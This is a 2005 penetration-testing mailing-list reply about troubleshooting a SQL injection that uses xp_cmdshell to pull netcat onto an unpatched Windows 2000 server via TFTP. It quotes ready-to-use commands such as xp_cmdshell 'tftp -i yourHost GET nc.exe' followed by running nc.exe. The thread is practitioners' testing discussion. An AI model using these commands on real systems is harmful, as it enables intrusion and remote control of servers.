Penetration Testing mailing list archives
Re: TFTP and XP_CMDSHELL - Weird
From: Frederic Charpentier <fcharpen () xmcopartners com>
Date: Thu, 23 Jun 2005 15:48:27 +0200
HI jose, try like that xp_cmdshell 'tftp -i yourHost GET nc.exe' xp_cmdshell 'nc.exe' and you will work in the current directory (c:\windows\system32). Jose Selvi wrote:
Maybe sqlsvc user can't write in c:\ folder. Can He?.The first call to tftp you are using Administrator user, who of course can write in c:\ .Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe". It must work. Andres Molinetti escribió:Hi, I am testing a Web App vulnerable to SQL Injection. It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.While trying to use the xp_cmdshell to upload nc.exe from my tftpd server to the Webserver, I experienced some problems.I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET nc.exe c:\nc.exe". File is downloaded.When I tried it through the wep app it failed. I tried directly through SQL Query Analizer and it also failed.SQL is running as a low priviledged account (sqlsvc)...Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\nc.exe" and IT FAILED.!!I can easily deduce that the problem is the TFTP client (tftp.exe)... Any Ideas?
-- Frederic Charpentier - Xmco Partners Security Consulting / Pentest web : http://www.xmcopartners.com
Current thread:
- TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 22)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Frederic Charpentier (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Javier Fernandez-Sanguino (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird - SOLVED Andres Molinetti (Jun 24)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
- Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)